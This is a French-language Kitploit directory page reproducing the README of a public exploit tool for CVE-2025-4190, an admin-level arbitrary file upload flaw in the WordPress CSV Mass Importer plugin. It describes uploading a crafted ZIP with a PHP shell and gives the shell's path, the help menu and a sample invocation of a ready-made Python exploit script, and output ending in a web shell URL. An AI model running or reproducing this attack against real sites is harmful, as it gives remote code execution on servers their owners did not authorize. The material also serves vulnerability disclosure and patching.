Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ Téléversement de fichier arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-4190
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ Téléversement de fichier arbitraire

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 Téléchargement arbitraire de fichiers

WordPress Plugin
CVE
Status
Author


📌 Description

Le plugin CSV Mass Importer (≤ 1.2) pour WordPress contient une vulnérabilité de téléchargement arbitraire de fichiers Admin+.
En raison d'une validation inadéquate des fichiers téléchargés, les utilisateurs à hauts privilèges (comme l'administrateur) peuvent télécharger des fichiers arbitraires sur le serveur, même lorsque cela devrait être restreint — par exemple dans les configurations multisite.

Cette vulnérabilité permet à un attaquant de télécharger des shells PHP ou des fichiers malveillants, conduisant à une exécution de code à distance (RCE) sur le serveur.

Découvert par Nxploited (Khaled Alenazi).


🔥 Détails

  • Nom du plugin : CSV Mass Importer
  • Version affectée : ≤ 1.2
  • Type de vulnérabilité : Téléchargement arbitraire de fichiers Admin+
  • CVE : CVE-2025-4190
  • ID WPVDB : e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • Chercheur d'origine : Khaled Alenazi (Nxploited)
  • Site web du soumetteur : https://github.com/Nxploited
  • Vérifié : ✅

💻 Preuve de concept (PoC)

Le plugin ne vérifie pas correctement les fichiers téléchargés lors de l'utilisation de la fonctionnalité d'import CSV.
Un fichier ZIP contrefait contenant un shell PHP peut être téléchargé et extrait dans un répertoire accessible publiquement.

Exemple de chemin du shell :

root@kitploit:~
<target-url>/wp-content/uploads/cmi-data/nxploited.php

🚀 Utilisation

Script

Ce dépôt contient un script d'exploitation Python prêt à l'emploi : 4190.py

Menu d'aide

root@kitploit:~
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password

Exemple d'exécution

root@kitploit:~
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin

Sortie attendue

root@kitploit:~
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)

🕰 Chronologie

  • Publié publiquement : 2025-04-26 (il y a environ 11 jours)
  • Ajouté à la base de données : 2025-05-07 (il y a environ 1 heure)
  • Dernière mise à jour : 2025-05-07 (il y a environ 1 heure)

🛡 Références

  • CVE-2025-4190 sur WPScan

⚠ Avertissement

Ce code est fourni uniquement à des fins éducatives.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce script.
À utiliser de manière responsable et uniquement sur les systèmes que vous êtes autorisé à tester.


Découvert et développé par Khaled Alenazi (Nxploited) 🌟

Télécharger l’outil